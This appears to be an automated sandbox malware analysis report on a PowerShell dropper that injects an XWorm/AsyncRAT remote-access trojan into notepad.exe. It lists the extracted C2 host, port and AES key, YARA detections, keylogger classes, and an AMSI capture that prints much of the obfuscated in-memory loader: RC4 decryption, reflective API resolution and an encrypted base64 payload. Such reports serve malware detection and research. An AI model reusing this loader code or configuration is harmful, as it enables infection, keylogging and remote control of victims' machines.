Source: 00000006.00000002.2207498321.000001D8A4D11000.00000004.00000800.00020000.00000000.sdmp |
Malware Configuration Extractor: Xworm {"C2 url": ["kdke.duckdns.org"], "Port": "8896", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"} |
Source: 6.2.notepad.exe.1d8a4a10000.0.raw.unpack |
String decryptor: kdke.duckdns.org |
Source: 6.2.notepad.exe.1d8a4a10000.0.raw.unpack |
String decryptor: 8896 |
Source: 6.2.notepad.exe.1d8a4a10000.0.raw.unpack |
String decryptor: <123456789> |
Source: 6.2.notepad.exe.1d8a4a10000.0.raw.unpack |
String decryptor: <Xwormmm> |
Source: 6.2.notepad.exe.1d8a4a10000.0.raw.unpack |
String decryptor: XWorm V5.6 |
Source: 6.2.notepad.exe.1d8a4a10000.0.raw.unpack |
String decryptor: USB.exe |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Users\user |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Users\user\AppData |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Users\user\AppData\Roaming |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Users\user\AppData\Roaming\Microsoft |
Jump to behavior |
Source: Malware configuration extractor |
URLs: kdke.duckdns.org |
Source: xy.ps1 |
String found in binary or memory: https://github.com/DARKNOSY/Rush-PowerShell-Obfuscator |
Source: 6.2.notepad.exe.1d8a4a10000.0.raw.unpack, XLogger.cs |
.Net Code: KeyboardLayout |
Source: 6.2.notepad.exe.1d8a4d1ce28.1.raw.unpack, XLogger.cs |
.Net Code: KeyboardLayout |
Source: 6.2.notepad.exe.1d8a4a10000.0.raw.unpack, type: UNPACKEDPE |
Matched rule: Detects AsyncRAT Author: ditekSHen |
Source: 6.2.notepad.exe.1d8a4a10000.0.unpack, type: UNPACKEDPE |
Matched rule: Detects AsyncRAT Author: ditekSHen |
Source: 6.2.notepad.exe.1d8a4d1ce28.1.unpack, type: UNPACKEDPE |
Matched rule: Detects AsyncRAT Author: ditekSHen |
Source: 6.2.notepad.exe.1d8a4d1ce28.1.raw.unpack, type: UNPACKEDPE |
Matched rule: Detects AsyncRAT Author: ditekSHen |
Source: 00000006.00000002.2207328628.000001D8A4A10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY |
Matched rule: Detects AsyncRAT Author: ditekSHen |
Source: 00000006.00000002.2206815552.000001D8A2F50000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown |
Source: 00000006.00000002.2206815552.000001D8A2F50000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown |
Source: 00000006.00000002.2207498321.000001D8A4D11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Detects AsyncRAT Author: ditekSHen |
Source: C:\Windows\System32\notepad.exe |
Code function: 6_2_000001D8A2F5B923 |
6_2_000001D8A2F5B923 |
Source: C:\Windows\System32\notepad.exe |
Code function: 6_2_000001D8A2F5B503 |
6_2_000001D8A2F5B503 |
Source: C:\Windows\System32\notepad.exe |
Code function: 6_2_000001D8A2F5BD5B |
6_2_000001D8A2F5BD5B |
Source: C:\Windows\System32\notepad.exe |
Code function: 6_2_000001D8A2F5A8DB |
6_2_000001D8A2F5A8DB |
Source: C:\Windows\System32\notepad.exe |
Code function: 6_2_000001D8A2F5C1E3 |
6_2_000001D8A2F5C1E3 |
Source: 6.2.notepad.exe.1d8a4a10000.0.raw.unpack, type: UNPACKEDPE |
Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
Source: 6.2.notepad.exe.1d8a4a10000.0.unpack, type: UNPACKEDPE |
Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
Source: 6.2.notepad.exe.1d8a4d1ce28.1.unpack, type: UNPACKEDPE |
Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
Source: 6.2.notepad.exe.1d8a4d1ce28.1.raw.unpack, type: UNPACKEDPE |
Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
Source: 00000006.00000002.2207328628.000001D8A4A10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY |
Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
Source: 00000006.00000002.2206815552.000001D8A2F50000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13 |
Source: 00000006.00000002.2206815552.000001D8A2F50000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13 |
Source: 00000006.00000002.2207498321.000001D8A4D11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
Source: 6.2.notepad.exe.1d8a4a10000.0.raw.unpack, Helper.cs |
Cryptographic APIs: 'TransformFinalBlock' |
Source: 6.2.notepad.exe.1d8a4a10000.0.raw.unpack, Helper.cs |
Cryptographic APIs: 'TransformFinalBlock' |
Source: 6.2.notepad.exe.1d8a4a10000.0.raw.unpack, AlgorithmAES.cs |
Cryptographic APIs: 'TransformFinalBlock' |
Source: 6.2.notepad.exe.1d8a4d1ce28.1.raw.unpack, Helper.cs |
Cryptographic APIs: 'TransformFinalBlock' |
Source: 6.2.notepad.exe.1d8a4d1ce28.1.raw.unpack, Helper.cs |
Cryptographic APIs: 'TransformFinalBlock' |
Source: 6.2.notepad.exe.1d8a4d1ce28.1.raw.unpack, AlgorithmAES.cs |
Cryptographic APIs: 'TransformFinalBlock' |
Source: 6.2.notepad.exe.1d8a4d1ce28.1.raw.unpack, ClientSocket.cs |
Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole) |
Source: 6.2.notepad.exe.1d8a4d1ce28.1.raw.unpack, ClientSocket.cs |
Security API names: System.Security.Principal.WindowsIdentity.GetCurrent() |
Source: 6.2.notepad.exe.1d8a4a10000.0.raw.unpack, ClientSocket.cs |
Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole) |
Source: 6.2.notepad.exe.1d8a4a10000.0.raw.unpack, ClientSocket.cs |
Security API names: System.Security.Principal.WindowsIdentity.GetCurrent() |
Source: classification engine |
Classification label: mal100.troj.spyw.evad.winPS1@4/10@0/0 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache |
Jump to behavior |
Source: C:\Windows\System32\notepad.exe |
Mutant created: NULL |
Source: C:\Windows\System32\notepad.exe |
Mutant created: \Sessions\1\BaseNamedObjects\QEL4wgqwsRH2WthB |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7032:120:WilError_03 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4n4y52un.zpo.ps1 |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();Set-StrictMode -Version 2$DoIt = @'function Crypt { param ( [byte[]]$key, [byte[]]$data ) $s = 0..255 $j = 0 for ($i = 0; $i -lt 256; $i++) { $j = ($j + $s[$i] + $key[$i % $key.Length]) % 256 $s[$i], $s[$j] = $s[$j], $s[$i] } $i = $j = 0 $output = [byte[]]::new($data.Length) for ($count = 0; $count -lt $data.Length; $count++) { $i = ($i + 1) % 256 $j = ($j + $s[$i]) % 256 $s[$i], $s[$j] = $s[$j], $s[$i] $k = $s[($s[$i] + $s[$j]) % 256] $output[$count] = $data[$count] -bxor $k } $output}function func_get_proc_address{Param($var_module, $var_procedure)$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress',[Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))}function func_get_delegate_type{Param([Parameter(Position = 0, Mandatory = $True)][Type[]] $var_parameters,[Parameter(Position = 1)][Type] $var_return_type = [Void])$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass',[System.MulticastDelegate])$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public',[System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')return $var_type_builder.CreateType()}[Byte[]]$encryptedData = [System.Convert]::FromBase64String('hTofNzZhzulVsFFp+HACplQ9P3ahPBbqw4tkMHSW0m9hYiqrCffLlSJiSDphhyFsTErdQVNi913EVNZvNToD6hL7Drhmt+gm1ZlP4JhK7I13mzQroJyUCK0O4xTM29A+Tkgbr5NiExtYUEcNgI0B/rcApStdz462bPK7Zn65RW7Bv0k1nik9X8g/253l3fRWd9PL/xSBd |